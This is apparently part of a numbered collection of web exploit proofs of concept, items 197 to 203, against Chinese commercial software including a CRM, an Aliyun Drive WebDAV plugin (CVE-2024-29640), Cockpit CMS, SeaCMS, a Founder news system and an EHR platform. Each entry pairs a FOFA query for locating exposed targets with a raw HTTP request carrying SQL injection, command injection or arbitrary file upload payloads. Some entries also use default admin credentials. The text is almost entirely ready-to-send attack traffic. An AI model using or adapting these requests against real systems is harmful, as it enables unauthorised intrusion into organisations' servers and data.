User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload
Fofa:title="Authenticate Please!"

1. Run the PoC to obtain the csrf value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--